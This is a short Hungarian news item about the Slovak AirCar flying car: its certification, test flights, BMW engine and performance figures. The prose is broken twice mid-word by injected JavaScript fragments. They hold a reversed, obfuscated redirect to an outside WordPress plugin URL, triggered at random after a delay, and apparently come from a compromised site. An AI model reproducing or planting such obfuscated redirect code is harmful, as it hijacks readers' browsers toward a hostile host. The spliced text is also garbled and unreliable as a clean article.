A tanúsítvány megszerzéséhez 70 órányi tesztrepülésre és 200 sikeres felszállásra, illetve landolásra volt szükség. A szlovák hibrid repülőautó, az AirCar tavaly nyáron irányítoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}totta magára a figyelmet, amikor a Nyitra és Pozsony repterei közötti távolságot 35 perc alatt tette meg. A járművet BMW motoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torral szerelték fel, benzinnel megy, szűk két és fél perc alatt pedig képes repülő üzemmódra átváltani, és a levegőben 160 kilométer/órás sebességre, illetve 2500 méteres repülési magasságra képes. A vezetéséhez pilótaigazolvány szükséges, a fel- és leszálláshoz pedig elég egy kisrepülőgépeknek tervezett kifutópálya. A szlovák mérnökök a következő, már lényegesen hosszabb tesztrepülését a Párizs–London útvonalon tervezik. Arról, hogy a…
- Hirdetés -